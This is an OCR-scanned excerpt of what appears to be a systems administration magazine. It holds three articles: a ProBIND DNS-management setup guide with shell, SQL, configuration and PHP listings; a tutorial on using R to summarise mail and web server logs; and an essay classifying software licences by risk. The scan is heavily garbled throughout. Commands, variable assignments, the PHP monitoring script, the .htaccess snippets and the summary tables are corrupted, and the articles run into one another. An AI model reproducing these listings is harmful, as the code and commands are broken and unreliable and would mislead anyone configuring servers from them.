through to the hidden primary server. ProBIND was configured to 
manage the two external secondary servers and ihe local primary in 
the external namespace together with a primary and secondary in 
the internal namespace. The test namespace was configured, but no 

servers were assigned because it 
was used purely for user testing. 
Note that ProBIND and the data¬ 
base it uses could have been 
installed on separate machines. 
However, as ProBIND uses minimal 
resources, both were installed onto 
the current hidden muster. 

ProBIND displays the DNS data 
as it is in the database rather than 
querying the servers directly. The 
ProBIND GUI can be used to do 
almost anything that was previously 
only available through the com¬ 
mand line. 

When you have finished editing, 
selecting PUSH from the GUI runs 
a PHP script that generates the 
BIND config files and zone files 
locally, then uses rsync over SSH to copy these to the master servers 
(secondary servers only get the config files) then reloads all the 
servers (using rnde over SSH). There is also an option to PUSH all 
data, which is useful if the servers have somehow gone out of sync 
or when recovering a failed server. 

Prerequisites 

In order for ProBIND to function correctly, it's necessary to 
install the following prerequisite software: 

• MySQL (3.23 and above). 

• Apache (1.3 and above). 

• PHP (4.0 and above) — Register globals needs to be on, and PHP 
needs to be able to run from the command line as well as through 
the Apache module. 

• Rsync (2.61 and above) — Used to replicate to remote BIND 
servers. 

• Perl 5 Perl Net::DNS SSH. 

Installing ProBIND 

1 he latest version ol ProBIND (2.01 at the time of writing) can 
be downloaded from http://probind2.sourceforge.net, but first 
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install the prerequisites. The ProBIND distribution contains a more 
detailed installation. For further information, see Install.txt. 

It is recommended that you install ProBIND in /var/ProBIND 
and then link to it from your Web root. To manage both internal and 
external DNS using ProBIND, you must install three instances of 
ProBIND (internal namespace, external namespace, and a test 
namespace for trying things out): 

mkdir /var/ProBIND 
cd /var/ProBIND 


Carry out the following in each namespace: 

Mkdir HOSTS 
Mkdir LOGS 

Chowrt probind HOSTS LOGS 

Create a .htaccess file in each of these directories to enable the Web 
server to list the contents. Without this, it is likely you will be 
unable to navigate and view the BIND zone files stored in the local 
file system that ProBIND rsyncs to the local and remote servers; 


#copy the downloaded probind tar-ball to here 

gunzip ProBIND2.0-buildl.tar.gz 

tar xvf ProBIND2.0-build.tar 

mv probind internal 

tar xvf ProBLND2.0-build.tar 

mv probind external 

tar xvf ProBIN02.0-bui1d.tar 


cat > HOSTS/.htaccess 
Options Indexes 
Fancyindexing on 
A D 

cat > LOGS/.htaccess 
Options Indexes 
Fancyindexing on 
A D 


ProBIND comes with a basic html front page that can be used to 

manage the multiple namespaces. To use this: Set up the initial MySQL database and ProBIND user (note password 

in “identified by”): 


cd /var/ProBIND 
cp /probind/parent/* . 

In s probind/inages images 

This default front page has a space for inserting your own DNS- 
monitoring utility. If you don't have one, see Listing 1, which can 
be run from cron as the user that owns the doc root. 

On the ProBIND host. Apache needs to run as the same user that 
will SSH to the remote servers. In my case, I created a user called 
probind, under which the Web server runs and which can SSH with¬ 
out a password to all DNS servers and reload BIND. Create 
ProBIND working directories (used by ProBIND to generate config 
and zone files prior to copying to servers) and allow the Web server 
to write to them. 


/usr/local/mysql/bin/mysql u root p - mysql -u root -p 
create database extdns; 

grant select,insert,update,delete on extdns.* to \ 
’pbext’Q'localhost’ identified by 'password': 
quit 

Initialize the database from the ProBIND SQL file: 
/usr/local/mysql/bin/mysql -u root -p extdns <etc/mktabl es,sql 
Edit inc/config.inc to match your details. For example: 

$T0P - "/var/ProBIND/extdns"; 


$TMP-"/tmp"; 


Figure 1 Example DNS infrastructure 
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Internal DNS Update. ProBIND pushes DNS config. to internal Master & Slaves 
Customer Slave DNS servers update their zone files by polling buslogics external slaves. 

External secondary® update their zone tiles by polling Customers primary servers 
(After initial slave zone setup from ProBIND) 
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$MYSGL_HOST - "localhost"; 

$MYS0L_DB - "extdns": 

*NYSQL_USER - "pbext"; 

$MYSQL_PASSWD - "password"; // Set up 

H password here 

*NAME_SPACE - "EXTERNAL"; 

To avoid having to add /usr/local/bin to the 
path of all the remote servers (which is not 
usually set in Solaris), edit the shell script 
sbin/push.remote. Change the lines: 

RSYNC="-b -p -t -r \ 

--exclude-'*.b,CVS,SEC,*.pid’ \ 
--cvs-exclude --suffix-.bek" 

User=named 

to: 


RSYNC-’rsync--rsync-path=/usr/local/bin/rsync \ 
-b -p -t -r --exclude-’*.b,CVS,SEC,*.pid‘ \ 
--cvs-exclude --suffix-.bek" 

User-probind 
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Pushing DNS updates to the servers 


Figure 3 Pushmg changesm target servers 
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Configure the ProBIND GUI 

Use your browser and navigate to 
http;//probindservername/probind and 
repeat the following for each namespace you 
manage. 

Click the “Misc. tools” link in the top 
frame, then select “Settings” in the sub-menu. 
Change the settings to reflect your site, in my 
client’s configuration, we set slave_on_slaves 
and two_step_update to "on”. 

Create new template directories for mas¬ 
ter and slave servers (or set up a directory for 
each server if you want different configura¬ 
tions on each): 

mkdir /var/ProBIND/extdns/templates/Master 
mkdir /var/ProBIND/extdns/templates/SIave 

For BIND version 9 servers: 

cp /var/ProBIND/extdns/tempiates/v9-master \ 
/var/ProBIMD/extdns/tempi ates/Master 
cp /var/ProBIND/extdns/templates/v9-slave \ 
/var/ProBIND/extdns/templates/SIave 

Edit rndc.conf and named.conf to make sure 
that the key used by BIND rndc to control the 
servers matches. 

For BIND version 8 servers: 

cp /var/ProBIND/extdns/templates/vS-master \ 
/var/ProBIND/extdns/templates/Master 
cp /var/ProBIMD/extdns/tempiates/v8-slave \ 
/var/ProBIND/extdns/templates/SIave 



Listing 1 Simple DNS monitoring script 

fM/tisr/local/bin/php 

<?PHP 

/* 

Simple DNS monitoring script for use with ProEIND 

This script generates tit ml which can be use to overwrite blank.html 

in the ProBIND directory. 

For best results run from cron and re-direct output to blank.html 
Author: Hark Barrow, mark.barrow@blconsulting.co.uk 
*/ 

// replace the below with your server ip Addresses. 
*servers-array(T92.168.1.2".T92.168.1.3V192.16B. 12.1", \ 

"10.10.1.1".*10.10.1.2"); 

// replace the below with the DNS name you want to run tests against. 
$name="www.blconsulting.co.uk”; 
function checkDNSServer(Iserver,Iname) 

{ 

global Iresult; 

$result“‘ 1 ; 

exec("/usr/sbin/dig @$serven $nane”,tresult); 
foreach (Iresult as $1ine) ( 

if (pneg_match("/Got answer:/i",$1ine)) 

( 

return true: 

} 

) 

} 

?> 

<HTMLXTITLE>Blank</TITLE> 

<BODY bgcolor="(/AAAA77”> 

<p align-"right"Xa href= ,, help.htmr , Xfont face=”Arial, Helvetica, \ 
sans-serif" size=- , ‘4-">help</font></a>4nbsp;</p> 


<p align“ , 'center">l l nbsp:</p> 

<p align =l 'center"Xfont face-’Arial, Helvetica, sans-serif"Xb> \ 

<f ont size="5">DNS Server Status</fontx/bx/fontx/p> 

<p align="center"Xfont size="2" face= !, Arial. Helvetica. \ 
sans - serf f">(Run as cron job against /var/ProBIND/dns.php)</fontX/p> 
<TABLE border=”4" align=center width“"70r> 

<trXtd><b>Server Address</tdXtdXb>Last Checked</tdXtd> \ 

<b>Error Output</tdX/tr> 

<?php 

foreach (Iservers as Iserver) f 
loutput - checkDNSServer(Iserver,$name); 
if (loutput “ true) 

1 

echo "<trXtd vailgn-’top'Pserver Iserver is a 1 ive</td> \ 

<td vai1gn='top’>" . dateC'l dS of F Y h:i:s A") . \ 
"</td><td vailgn='top'>&nbsp;</td></tr>": 

] 

else [ 

echo "<trXtd vailgn='top’Xfont color=#FFOOOO>server \ 
Iserver is dead</fontX/tdXtd va i 1 gn—' top * > \ 

<font color«#FFC000>Last Checked . \ 
dateCl dS of F Y h:i:s A") . ”</fontX/td>"; 
echo"<td vai 1 gn-’ top’Xfont col or=#FFOOOO>"; 
foreach (Iresult as Iline) l 
echo . Iline; 

1 

echo "</fontX/tdX/tr>"; 


echo ”</table> M ; 
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The file named.tmpl in the above directories is used by ProBIND to 
generate named.conf at push time. If you have any specific settings 
regarding logging, etc., add these to named.tmpl. 

Configure Servers 

Navigate to http://probi ndserveraddress/probi nd. For each 
namespace, select “misc tools” from the Tab menu, then select 
“servers” from the sub-menu. Select “Add another Server”. 

Update the settings for each of the servers you want to control 
with ProBIND. If you intend to use a hidden master configura¬ 
tion, you need to set the NS record to “Skip” for the hidden mas¬ 
ter server to prevent the hidden master NS record being published 
in the DNS. 

Once the server is set up, a link to this server should appear on 
the server’s screen. Clicking on this link will allow you to set spe¬ 
cific options per server in ProBIND rather than having to manually 
edit the named.tmpl file. 


Using ProBIND 

Use of ProBIND is pretty straightforward. For instance, editing 
zones is simply a case of clicking on the zone listed on the left-hand 
side, as shown in Figure 2. Then you can make the required changes 
by selecting “Push Updates”. You can review' the changes before 
sending them to each server by clicking on named.conf or file links 
under “View'", perform nslookup queries against each server using 
“Test”, or push the changes to all or individual servers by clicking 
on “Start Update” (Figure 3). 

Customizations 

During the implementation, I discovered that there was no easy 
way to get ProBIND to copy per zone options to secondary servers 
(although this worked fine to the primaries). Because this was a 
requirement for the client, I wrote a patch for ProBTND to support 
it. If you are interested in this patch, just send me an email and I’ll 
share it. 


Import Script Caveats 

ProBIND includes an import script to allow you to import. 
However, ProBIND cannot support the include statement with 
named.conf, which means a new named.conf must be created from 
the concatenation of masters.conf and slaves.conf. 

During evaluation, a bug was discovered in that the import script 
fails if the named.conf uses the following (correct) format: 

zone "blconsulting.co.uk” in { 
type master; 

file "master/db.blconsulting.co.uk": 
allow-transfer { blc-slaves; ); 


Mark Borrow is a Senior Technical Consultant specializing in 
UN/X/eCommerce working for Business Logic Consulting LTD. He can he 
contacted at: mark, bar r ow§b Iconsuiting.co. uk. 


Download Sys Admin code from; 

www.sysadminmag.com or ftp.mfi.com 


To work around this, edit and replace with this: 

zone "blconsulting.co.uk" { 
type master; 

file "master/db.blconsulting.co.uk"; 
allow-transfer { blc-slaves; }; 

}; 

The data is then imported as follows: 
cd /var/ProBIND/extdns/etc 

./import -v -a -d /path to old named.conf/named.conf 

The import also imports the zone options. For example, if you set 
allow -transfer {slave -servers;};, where slave-servers is an 
alias for all your slave servers, the name “slave-servers” must be 
changed alter import to {$ AC L }. ($ AC L gets converted by 
ProBIND to the IP addresses of each server managed by ProBIND 
at push time.) The easiest way to do this is by using an SQL query. 
For example: 

/usr/local/mysql/bin/mysql u root p - mysql -u root -p extdns 

update zones set options-’allow-transfert JACL \ 
where options like ’%slaves-servers^'; 

Query OK, 38 rows affected (0.00 sec) 

Rows matched: 38 Changed: 38 Warnings: 0 
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TOOLS 


Using the R System for Systems 
Administration 

Mihalis Tsoukafos 


T his article is about R, which is an advanced statistical 
package with many complex capabilities. However, don’t 
be afraid of R if you aren’t very comfortable with mathe¬ 
matics and statistics. This article will cover some simple, useful 
capabilities of the package tailored for systems administrators. 

R is a GNU project based on S, which is a statistics-specific lan¬ 
guage and environment developed at the AT&T Bell Labs. R is an 
interpreted computer language. The R system distribution supports 
many statistical procedures including linear and generalized linear 
models, nonlinear regression models, time series analysis, classical 
parametric and nonparametric tests, clustering, and smoothing. 
The current version of R is 2.0.0, which was released on October 
4, 2004. For more information, 
visit the R Project home page 
(http://www.r-project.org). 

There is also a commercial imple¬ 
mentation of S, called S-PLUS 
(http: //www.insightful .com/), 
which has more facilities and capabil¬ 
ities than R. The examples presented 
in this article can also run in S-PLUS 
with little or no modifications. 

Running the R System 

R runs on Unix/Linux variants as 
well as on Windows. R can also run 
on Mac OS X Panther. There are 
GUIs for R, but all you need for the 
purposes of this article is the com¬ 
mand-line version. The examples of 
this article have been written using 
R on Mac OS X Panther and Debian Linux. 

To run R, type R (assuming that the R binary is in your PATH), 
which will show something like the following: 

racoon:~/code/R i R 

R : Copyright 2004. The R Foundation for Statistical Computing 
Version 1.9.0 (2004-04-12). ISBN 3-900051 00-3 

R is free software and conies with ABSOLUTELY NO WARRANTY. 

You are welcome to redistribute it under certain conditions. 

Type ’licensee)' or 'llcenceO' for distribution details. 


'help.startO’ for a HTML browser interface to help. 
Type 'qO' to quit R. 

[Previously saved workspace restored] 



To quit R, just type q( ) at the prompt. 

Basic Commands of the R System 

First, the commands for inserting, naming, and selecting data are 
presented. The following example creates a data set (actually a vec¬ 
tor) called SYSADMIN. This data 
set contains the Oth to 6th powers of 
number 3. To view the data in an 
existing data set. just type its name 
at the R prompt: 


a 


.r-project.org 



> SYSADMIN <- 3*(0;6) 

> SYSADMIN 

[1] 1 3 9 27 81 243 729 

> 

The notation 0:6 returns a 
sequence for 0 to 6, including 0 
and 6, which is a total of seven 
numbers. The narnes () command 
allows you to access the elements 
of a vector by a given name. In this 
example, the numbers 0 to 6 are 
used: 


> names(SYSADMIN) <- 0:6 

> SYSADMIN 

0 1 2 3 4 5 6 
1 3 9 27 31 243 729 

> cl ass(SYSADMIN) 

[1] "numeric" 


If you want to remove the names you gave to the elements of the 
vector with the names(SYSADMIN) command, you cun use the fol¬ 
lowing command: 


R is a collaborative project with many contributors. 

Type 'contributors() 1 for more information and 
'citationO’ on how to cite R in publications. 

Type 'demoO' for some demos. 'he 1 pt)* for on-line help, or 


names(SYSADMIN) <- NULL 

The following lines show the advantages of calling a vector by 
name: 
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Figure 2 Pairs (MAILDATA) output 



Figure 3 Hist ( Delay,...) output 


A Mail Server Application 

Log files from a Postfix mail server are 
going to be used in this simple application. 
The data of interest in the log files includes 
the main DNS domain (.gr, .com, etc.) of 
the outgoing mail address, the delay dura¬ 
tion (in seconds), and the time (in 
HH:MM:SS format) of the day. For getting 
the data, grep, sed, and awk were used. 
(Perl or another script language could have 
been used instead.) The first 10 lines of the 
data, including the column titles, are shown 
in Table 2. 

Extracting Information 

What information can we get from the 
data using R? Summary info (using the 
SummaryO command) can be extracted, 
which in this particular case gives: 

> summary(MAILDATA) 


Time 


Doma 

i n 

Delay 

11:07:12: 

5 

au ; 

3 

Min. 

1.00 

08:51:05: 

3 

com: 

10 

1st Qu. 

2.00 

13:23:47: 

3 

edu: 

2 

Median 

3.00 

06:12:53: 

2 

gr : 

: 117 

Mean 

11.38 

16:42:34: 

2 

org: 

: 11 

3rd Qu. 

6.00 

00:52:50: 

1 

uk 

: 2 

Max. 

217.00 

(Other) : 

129 







This tells us that most of our emails go to 
the .GR domain and that the busiest 
moment (relatively busy because those log 
files were from my home dial-up server) is 
11:07:12. Instead of Time, you can use 
Day, Week, Month, or even Year variables 
for setting mail information. The (act that 
the "3rd Qu. value is very close to the 
Median means that there are not major 
delays in the sending of the outgoing mes¬ 
sages process, at least tor the 75 7c of the 
items in the data set. if you want more 
precise information, you can divide the 
data set into smaller data sets. 

Output Explanation 

The Time and Domain data are not 
numbers, so R sums the occurrences (con¬ 
sidering each value as a string) ot each 
“string" and prints the top numbers. As far 
as Delay (which is numeric) is concerned, 
R calculates and displays the following six 
values: 

• Mi n . _ This is the minimum value of the 
data set. 

• Median — This is an clement that divides 
the data set into two subsets (left and 
richt subsets) with the same number ol 
elements. If the data set has an odd num¬ 
ber of elements, then the Median is part 
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of the data set. On the other side, if the 
data set has an even number of elements, 
then the Median is the mean value of the 
two center elements of the data set. 

• 1 st Qu. •— The 1 st Quartile q 1 is a value, 
not necessarily belonging to the data set. 
with the property that (at most) 25% of 
the data set values are smaller than ql 
and (at most 75%) of the data set values 
are bigger than q 1. You can consider it as 
the Median of the left half subset of the 
sorted data set. In the case that the num¬ 
ber of elements of the data set is such that 
ql does not belong to the data set, it is 
produced by interpolation of the two val¬ 
ues at the left (v) and the right (w) of its 
position to the sorted data set as: 

pi = 0,75 * v + 0*25 * w 

• Mean — This is the mean value of the 
data set (the total sum divided by the 
number of the items in the data set). 

• 3rd Qu. — The 3rd Quartile q3 is a value, 
not necessarily belonging to the data set, 
with the property that (at most) 75% of 
the data set values are smaller than q3 
and (at most) 25% of the data set values 
are bigger than q3. You can consider it as 


the Median of the right half subset of the 
sorted data set. In the case that the num¬ 
ber of elements of the data set is such 
that q3 does not belong to the data set, it 
is produced by interpolation of the two 
values at the left (v) and the right (w) of 
its position to the sorted data set as: 

q3 - 0.25 * v + 0,75 * w 

Referring back to the example, the fact 
that the 3rd Qu. value is very close to the 
Median means that there are not major 
delays in the sending of the outgoing 
messages process, at least for the 75% of 
the items in the data set. If you want 
more precise information, you can divide 
the data set into smaller data sets. 

* Max. — This is the maximum value in 
the data set, Please note that many defin¬ 
itions for finding Quartiles exist. If you 
try another statistical package, you may 
get different results. 

Using the pairs! ) command (output 
shown in Figure 2), shows a graphical 
overview of the data. From this image, and 
especially from the Time-Delay pair, you 
can conclude that there are not major 


delays. Also, imagine that you can auto¬ 
mate this procedure and have the informa¬ 
tion sent to your email. 

By using the attach! ) command with 
a data set as an argument, you can use 
the columns of the data set as individual 
data sets. Thus, you can try the 
hi St (Del ay) command to draw a his¬ 
togram of the frequencies of the delays 
(after giving attach (MAI LOATA)) and get 
a more accurate view of the delay times. 
By executing hi st(Del ay, xl ab="Del ay 
in seconds", ylab-’Number of emails", 
labels= RUE) you get the plot shown in 
Figure 3. 

A Web Server Application 

For this example application, data is 
taken from a log tile of a Web server. The 
duration of the log file is one day. Again, 
the data is taken using a combination of the 
sed. awk, and grep utilities. 

The first 10 lines of the data, including 
the column titles, are shown in Table 3. 

Note that the underscore in front of the 
status code was added so that the 
StatusCode value will not be considered a 
numeric value by R. 
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The summa ry C WWW DATA) command gives the following output: 


> summary C WWWDATA) 

Time ServerBytes ClientBytes StatusCode 


10:46 

3145 

Min. 

0 

Min. 

0.0 

_304 

:7 09 2 55 

10:58 

3081 

1st Qu. 

140 

1st Qu. 

401.0 

_200 

:435146 

10:55 

3066 

Median 

142 

Median 

435.0 

_302 

: 7371 

10:37 

3054 

Mean 

2460 

Mean 

438.1 

_404 

: 4641 

10:32 

2959 

3rd Qu. 

407 

3rd Qu. 

470.0 

_500 ' 

: 3983 

09:30 

2814 

Max. 

49083902 

Max. 

2158.0 

_206 

: 2254 

(Other) 

1144676 





(Other) 

: 145 


> 
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Notice that the busiest minute was 10:46 when 3145 requests were 
served. Again, note that the underscore in front of the status code 
was added so that the StatusCode value will not be considered a 
numeric value by R. 

For more analysis, get all the data for the 12:00 to 12:59 timeframe 
(g rep ’ A 12 ' WWWDATA. data). This data set is named WWW12. 
Execute the pal rs (WWW12 ) command. The output is shown in Figure 4. 

Also, the summa ry (WWW12 ) command gives the following output: 


> summa ry(WWW 12) 


Time 

ServerBytes 

ClientBytes 

StatusCode 

12:20 

2003 

Min. : 0 

Min. 

: 0.0 

_304 :4 5986 

12:24 

1848 

1st Qu.: 141 

1st Qu. 

: 403.0 

_200 :28914 

12:55 

1800 

Median : 142 

Median 

: 436.0 

_302 : 570 

12:16 

1789 

Mean : 2273 

Mean 

: 444.6 

_404 : 292 

12:01 

1744 

3rd Qu.: 407 

3rd Qu. 

: 480.0 

_500 : 214 

12:19 

1713 

Max. :2631733 

Max. 

: 1230.0 

_206 : 124 

(Other) 

65217 




(Other); 14 


> 


See Table 4. 

The main benefit of using R for systems administration is that 
you get a different perspective of your data, which can be useful as 
well as informative. 


Figure 4 Pairs (WWW12) output 


CO 

to 

rt 

<N 


0 1500000 2468 


Tim© 

| 

¥ 

1 t * 

* 

o 

..11 

i, 

0 20 40 60 

-o- 

Oft qoGO O 

ServerBytes 

o 

^- 

Q 

lOQQQflfl 

JO 

jjjg| 

i 

ClientBytes ! 

- 

'III 

0 * 

H i'W i i i 1 
0 400 1000 

0 o o 

5 - 

D 

0 

O 

0 

0 

E» 

mo o 

o 

StatusCocf 

& 

- o O j 

mo o oo 

00 

0 <* 


^>® 


0 20 40 60 0 1000 
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School Teacher. He holds a B.Sc. in Mathematics and a M.Sc. in IT from 
University College London. Before teaching, he worked as a Unix systems 
administrator and an Oracle DBA. Mihcdis can he reached at: 
tsoukalos§sch.gr. 


Table 3 

i Data from a Web server log file 
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Time 

ServerBytes 

ClientBytes 

StatusCode 

00:00 

141 

433 

304 

00:00 

142 

437 

304 

00:00 

0 

426 

200 

00:00 

142 

435 

304 

00:00 

142 

431 

304 

00:00 

114096 

465 

_200 

00:00 

141 

436 

3 04 

00:00 

0 

295 

200 

00:00 

141 

434 

1 1304 .. 


Table 4 Explanation of error types 

■ 

m 

■ 

Status Code 

Error type 

Explanation 

Ixx 

Informational 

This series of responses is 
not currently used. They are 
reserved for future use. 

2xx 

Success 

The action was successfully 
received, understood, and 
accepted. Status code 200 is 
used to indicate a successfully 
retrieved Web page. 

3xx 

Redirection 

Further action must be taken 
in order to complete the 
request. For example, code 301 
can be used to indicate that a 
page has been moved and the 
browser may be redirected to 
the new page. 

4xx 

Client Error 

These codes are returned 
when a browser has made a 
request that canit be fulfilled. 
"404 - URL not found" is 
probably the most commonly 
seen. 

5xx 

Server Error 

The server failed to fulfill an 
apparently valid request. 
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OPEN SOURCE 


Licensing Risks, Not Revolutions 

Bryan J, Smith 


T he primary role of IT is to mitigate risk to corporate invest¬ 
ments in information. Simple labels on software like “open" 
or "proprietary' do little to classify risk to an organization’s 
data and IP. In this article. I’ll examine these labels and suggest 
some new' ways to define software types. 

One-Dimensional Thinking 

Is it open or proprietary? How do you define open or propri¬ 
etary? The concepts themselves are relative to differing viewpoints. 
Such one-dimensional variables 
with only two extremes offer a poor 
way to categorize software and their 
licenses. 

Some may argue these two 
extremes are enough. As you read 
this, you may associate these terms 
with the flagship licenses of the 
open and proprietary world, the 
GNU General Public License 
(GPL) and the Microsoft End User 
License Agreement (EULA). 
respectively. Other examples may 
come to mind, but the categories 
seem distinct enough to most. But 
w hat about for other. lesser know n 
licenses? Do these extremes of 
“open" and “proprietary” represent 
them well? 

The term "open" is very rela¬ 
tive. especially in terms of marketing. Some consider it to mean 
"open source.” Others consider it to mean “open standard," or 
possibly the older concept of “open systems.” What about “open 
IP”? Does open IP offer freely redistributable derivatives? Is it 
merely royalty-free for specific uses? Or is it only under “fair and 
reasonable” licensing terms? Viewpoints w-il] be relative. 

Putting those arguments aside for a moment, it is easy to forget 
a major role of IT and IT policy. A major role of IT is to mitigate 
risk to data — data that represents hundreds, thousands, possibly 
even millions of man hours in creation. The actual risk to data is 
the ultimate consideration in IT. So the one-dimensional terms 
open or proprietary when labeled on software and their 
licenses do little to represent an adequate assessment of their risk 
in deployment at an organization. 

Two-Dimensional: Fidelity Squared 

By merely adding another dimension to the argument, w'e add 
tar greater fidelity and square the number of categorizations. The 


question is, then, what two variables should we use for software? 



I suggest these two: 


• Variable: source code availability 

* Variable: standards compliance 

All software has available source code, at least at some point in 
release. All software conforms to some set of standards. What values 
can we now- associate to source code availability and standards com¬ 
pliance? Let's revisit the terms of 
original, one-dimensional argument: 

• Value: open 

• Value: closed (proprietary) 

Using the 2D model, we can move 
from two categories to four as illus¬ 
trated in Figure 1: 

• Open source, open standard 

• Closed source, open standard 

• Open source, closed standard 

• Closed source, closed standard 

The concept of using a 2D model 
for social constructs is nothing new. 
Software licenses are 100% social 
construct, so they tend to follow 
social tendencies. 

As an analogy, the values of “conservative" and “liberal" applied 
to the two axes of “individual and “fiscal" have been used to cate¬ 
gorize American political parties more effectively than just the one- 
dimensional values on their own. Even though most Americans 
associate conservative and "liberal" with the two most popular 
American political parties, by merely adding the second dimension 
ot thought, w'e can now categorize other parties such as the 
American Libertarian party ("fiscally conservative, individually lib- 
ciul ). Ol course, the values will always be relative. Continuing our 
analogy to the American political system, both of the two popular 
American political parties tend to be “conservative" compared with 
various European viewpoints. 

The same is true of software licenses. The terms of “open" and 
closed mean different things from different viewpoints, especially 
from the ultimate consideration of risk. To begin, let us consider the 
three of the four licenses that are at least “open" in one form or 
another, breaking down both their categorizations and risk of 
deployment. 
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Categorizing Open Software 

Consider the viewpoint of an “open source" advocate. Now 
consider the viewpoint of an “open standards” proponent. And, 
consider the viewpoint of a proprietary software vendor who 
offers some level of “open standards” support. Next, explain the 
term “open software”. And to throw' yet another popular term into 
the mix, describe “vendor lock-in”, given these varying levels of 
“open software”. 

Instead of using these popular and varying terms of "open soft¬ 
ware,” I think it would be more effective to define a new set of terms 
based on our 2D standards versus source code model. Let’s begin 
with these three “open software” types: open source, open standard; 
closed source, open standard; and open source, closed standard. 

As much I admire Richard Stallman, I do not admire his insis¬ 
tence in using the term “free software.” 1 can understand his reasons 
for the same reason others use the term “hacker” to profess techni¬ 
cal prowess. Unfortunately, like the modem definition of “hacker,” 
the majority viewpoint defines what the term “free software 
means, not the minority one. The majority considers the term “free 
software” to mean free of cost, not freedom. Some even refer to 
Linux as the “shareware version of UNIX”. The term “freedom 
software” is a bit long, and “freeware” has all the original connota¬ 
tions of being free of cost. 

So, let’s build on an obvious idea and call "open standard, open 
source” software freedom ware for short: 

• Freedomware: open source, open standard 

• Freedomware must be free to use, free to modify, and tree to 

redistribute. 

• Freedomware must be free of IP restrictions and requirements. 

Another obvious term comes from the shortening of “standards- 
based software”. Such standard ware is software that has “closed 
(proprietary) source”, but adheres to “open standards”. This is a 
gray area, and some implementations may be considered more 
moderate than near the extremes of standards or source. For 
example, does potential standardware merely export/import stan¬ 
dards? Or, worse yet, does it embrace standards but modify them 
in a way only the product works with its own implementation? At 
what point does it implement a “closed (proprietary) standard” 
and not an “open standard”? 


Figure 1 Standard v. source of values open and closed 
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• Standardware: closed source, open standard 

• Standardware must either follow strict standards or fully publish 
all new standards as implemented and can be re-created in another 
product. 

• Standardware must produce data that can be read fully read into 
another product, ideally one that already exists. 

• Standardware that introduces new standards or new data format 
may not be encumbered by any additional license or IP restrictions. 

And last of the “open software”, a rarer implementation is source- 
ware. A variation of freedomware, sourceware offers “open source” 
code with “closed (proprietary) standards”. At first this may sound 
like an oxymoron, but sourceware is very common. Vendors are Iree 
to put restrictions on software, even when source code is released 
into the open, in a variety of ways: 

• Sourceware: open source, closed standard 

• Sourceware allows vendors to “open” source code but restrict the 
ability to publicly distribute derivatives or otherwise freely redis¬ 
tribute the software. 

• Sourceware could be freedomware that requires a non-free- 
domware library or support module, or that uses IP that does not 
have an “open” license. 

• Sourceware could be freedomware that has been modified in a 
way that cannot be redistributed publicly. 

To reiterate. I offer these categorizations for “open software” to 
simplify discussions, such as mitigating risk. 

Mitigating Open Software Risk 

Adoption of the terms freedomware, standardware, and source- 
ware is a risk to corporate investments in data. Looking at each, let s 
consider four factors of risk: standards compliance, support and 
modification, exit strategy, and software or TP requirements. 

Standards Compliance 

When considering standard compliance, we can think in terms of 
the following. Is it inherent to the software (base formats); is it done 
simply for import/export; and how common are the formats? 

Standards compliance is a consideration of utmost importance 
for mitigating long-term risk to data and corporate investments 
in data. Even the most proprietary of software vendors claims 
“standards compliance in their products. But standards themselves 
are hard to define. Consider this a major risk. 

Freedomware, standardware, and sourceware should use exist¬ 
ing, well-established formats. If they define their own, are they 
standardized with another party, or are they supported by other 
applications? Many people consider freedomware and sourceware 
to be self-standardizing, but if no other application supports the 
format, this could be an area of major, potential risk. In fact, free¬ 
domware can and sometimes does result in eccentric formats, 
although one could argue that s how some of the greatest software 
innovations have come about. 

Documented standards are one thing, but proliferated stan¬ 
dards with documentation greatly reduce risk. Source code itself 
is not an ideal method of documentation or standardization 
(although it can expose differences between the documented 
standard and actual software). 

Standardware has no source, so it is not selt-revealing. 
Standardware then becomes a matter of independent verification 
and possible testing to be compliant with well-established and 
“open standards” If it’s not compliant, it is not standardware. 
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Beware of software that does not use "‘open standards” by default in 
its inherent formal, but only offers limited support, possibly only as 
an ini port/ex port function. Such software is not standard ware. 

Also know that XML on its own is not an “open standard”. XML 
is merely a standard for creating new standards — largely to answer 
vendor complaints that standards organizations, such as the World 
Wide Web Consortium (W3C), are too slow in adopting. HTML is 
an instance of XML from the W3C. HTML provides support to 
XML to fully define itself. So, if a vendor claims to use XML, 
inquire whether they have they registered their entire XML stan¬ 
dard. including all document type definitions (DTDs) and support 
XML schema with well-established, independent organizations like 
the Organization for the Advancement of Structured Information 
Standards (OASIS), considered the primary' registrar of completely 
documented XML instances. 

Support and Modification 

Ultimately any software is under the support and maintenance 
of one or more entities. But what if changes arc needed to the 
software — patches, fixes, special needs, etc.? Lor each license, you 
should consider support and modification. 

Freedomware may be released by a commercial entity, by the 
community, or a combination. If a commercial entity is involved, a 
profit motive must be considered. Do they rely on other markets 
(hardware) or dual-license the software as non-freedomware? Or 
does the software prefer non-standard formats by default, which is 
not freedomware (or “open software” at all). 

Ideally, various support offerings should be available, from 
per incident to SLAs (service level agreements). What if your 
organization modifies the software but does not want to distribute 
the changes? is it allowable under the license to turn the free¬ 
domware into internal-only, corporate-specific sourceware 
(which is allowable under the GPL)? Or can organizations license 
such modifications, if they're not publicly distributed? 

In the case of standardware or sourceware, is the vendor the sole 
maintained Partnerships with industry developers or the commu¬ 
nity are ideal, because they help distribute the burden of support. 
Vendors (and partners) should offer SLAs, which may be part of 
their profit strategy. Dual-licensing is a key consideration, espe¬ 
cially if the standardware or sourceware is also available as free¬ 
domware. Always consider how patches, fixes, and other changes 
arc made, and whether that release model is sound. The need to 


maintain additional, internal staff for internal structure to ensure 
configuration management is vastly underestimated, especially in 
the ease of more eccentric freedomware. Many freedomware adop¬ 
tion projects tail because organizations assume they will save on the 
costs of release and configuration management as well as licensing. 
Nothing is further from the truth. 

Exit Strategy 

No one should assume that freedomware is self-maintaining or 
perpetual from a risk standpoint. If the maintenance behind free¬ 
domware or sourceware dissolves, is there an internal or community 
effort to continue development of the project? Additional mitigation 
costs are often overlooked in risk assessment. In the case of source- 
ware. does the vendor plan to offer the source code under a different 
license if they discontinue the product? 

If the commercial standardware vendor dissolves, lack of 
access to source code becomes a major risk. Is the standardware 
already available as compatible freedomware or sourceware? 
Standardware that is also available as freedomware or sourceware 
reduces this risk. Of course, the ideal standardware is one that is 
not discontinued, because the costs ultimately fall onto the few 
(or many) who continue to use it. Proliferation, or lack thereof, of 
any “open software” heavily influences the amount of risk in any 
software adoption. 

In all eases (and most locales), understand that copyright law is 
the ultimate rule, and the copyright holder reserves all rights. 
Copyrights are the key issue when it comes to exit strategy. An exit 
strategy should be defined by the copyright holder in the license 
should the software ever be discontinued. Do not assume any exit 
strategy from the copyright holder(s) unless explicitly stated. 
Otherwise the software is a major risk in the absence of any other, 
